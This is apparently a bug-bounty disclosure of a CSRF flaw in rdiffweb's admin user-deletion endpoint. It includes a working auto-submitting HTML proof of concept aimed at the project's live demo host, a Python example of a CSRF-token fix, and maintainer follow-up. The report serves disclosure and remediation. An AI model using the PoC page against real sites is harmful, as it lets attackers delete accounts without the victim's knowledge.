Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Reported on
Sep 11th 2021
✍️ Description
Hello dear Rdiffweb team.
I found a CSRF vulnerability on the following endpoint that allows attackers to delete users with PoC.html.
🕵️♂️ Proof of Concept
1. A user with the right privileges should be logged in using Firefox or Safari.
2. The user goes to a website that contains PoC.html.
3. After visiting the attacker's website, the user with username aaaa will be deleted.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="aaaa" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Also, an attacker can send multiple requests with the help of iframes.
Fix
I just want to suggest that you set a CSRF token for this form.
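The synchronizer-token fix suggested above, as an added example (not rdiffweb's own code, and not the patch the maintainer shipped). The session dict, the in-memory user table and the request dicts are constructed stand-ins for the web framework; the handler names and the `csrf_token` field name are assumptions. The point is the mechanism: the token is minted into the server-side session and copied into the application's own form, so a browser visiting the attacker's PoC.html still attaches the session cookie to the cross-site POST but the attacker's page has no way to read the token and include it.

```python
"""Synchronizer-token CSRF protection for a state-changing form handler.

Added example, not rdiffweb's code. The session store, the user table and
the request/form dicts are constructed stand-ins for a real web framework.
"""
import hmac
import secrets
from html import escape

# Constructed stand-in for the server-side user table.
USERS = {"admin": {"admin": True}, "aaaa": {"admin": False}}


def issue_csrf_token(session):
    """Mint a per-session secret once and reuse it for that session.

    Only a page rendered by the application's own origin can read the token
    and embed it in a form; a cross-site page cannot.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def render_delete_form(session, username):
    """HTML the application serves to a logged-in admin.

    The hidden field carries the session's token so the browser submits it
    back with the legitimate POST.
    """
    token = issue_csrf_token(session)
    return (
        '<form action="/admin/users" method="POST">'
        '<input type="hidden" name="action" value="delete" />'
        f'<input type="hidden" name="username" value="{escape(username)}" />'
        f'<input type="hidden" name="csrf_token" value="{escape(token)}" />'
        '<input type="submit" value="Delete" />'
        "</form>"
    )


def csrf_token_valid(session, form):
    """Compare the submitted token with the session's, in constant time."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_users_post_vulnerable(session, form, users):
    """Before: the only check is the session cookie, which the browser
    attaches to a cross-site POST as well, so PoC.html succeeds."""
    if not session.get("user"):
        return 401
    if form.get("action") == "delete":
        users.pop(form.get("username"), None)
        return 200
    return 400


def handle_users_post_protected(session, form, users):
    """After: reject any POST whose token does not match the session's."""
    if not session.get("user"):
        return 401
    if not csrf_token_valid(session, form):
        return 403
    if form.get("action") == "delete":
        users.pop(form.get("username"), None)
        return 200
    return 400


def simulate():
    """Replay the report's scenario against both handlers.

    Returns, per case, the HTTP status and whether user "aaaa" survived.
    """
    results = {}
    # Victim: an admin with a live session (the cookie rides along on
    # every POST to the site, including the one forged by PoC.html).
    session = {"user": "admin"}
    issue_csrf_token(session)
    # The attacker's form has fixed fields; it cannot contain the token.
    attacker_form = {"action": "delete", "username": "aaaa"}

    users = dict(USERS)
    status = handle_users_post_vulnerable(session, attacker_form, users)
    results["vulnerable"] = (status, "aaaa" in users)

    users = dict(USERS)
    status = handle_users_post_protected(session, attacker_form, users)
    results["protected_forged"] = (status, "aaaa" in users)

    # Legitimate admin submission through the application's own form.
    users = dict(USERS)
    legit_form = dict(attacker_form, csrf_token=session["csrf_token"])
    status = handle_users_post_protected(session, legit_form, users)
    results["protected_legit"] = (status, "aaaa" in users)
    return results


if __name__ == "__main__":
    for case, outcome in simulate().items():
        print(case, outcome)
```

The forged request is refused with 403 and "aaaa" survives, while the same request carrying the session's token goes through. The comparison uses `hmac.compare_digest` so token validation does not leak timing information; every state-changing route (not just this one form) needs the same check, which is the point of the follow-up reports below.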
Hey amammad, I've opened a PR on the repo asking for a security policy with email.
@admin Hey Zi
The maintainer already put their own email for your pull request
https://github.com/ikus060/rdiffweb/pull/73
@admin hey admin
They already put their email in 25 days ago!!!
There are other reports for other endpoints, please validate them too.
You can see them in the reports section.
@amammad
I've added CSRF everywhere applicable. I'm not sure whether I've missed any endpoint.
Can I ask whether you have checked these reports?
https://www.huntr.dev/bounties/5ee61635-4a57-41f6-9536-a07737e99db2/ https://www.huntr.dev/bounties/74c976cf-cf31-4a51-992b-45b8c488c4f2/ https://www.huntr.dev/bounties/b558dfb2-38a4-4ea7-a53f-6808065337aa/ https://www.huntr.dev/bounties/740ac468-47b3-4937-98ef-01e8e5e1382b/
I tested all parts of the application and found the endpoints that don't have any CSRF protection.
I mean that I filed one report for every endpoint that was vulnerable to CSRF.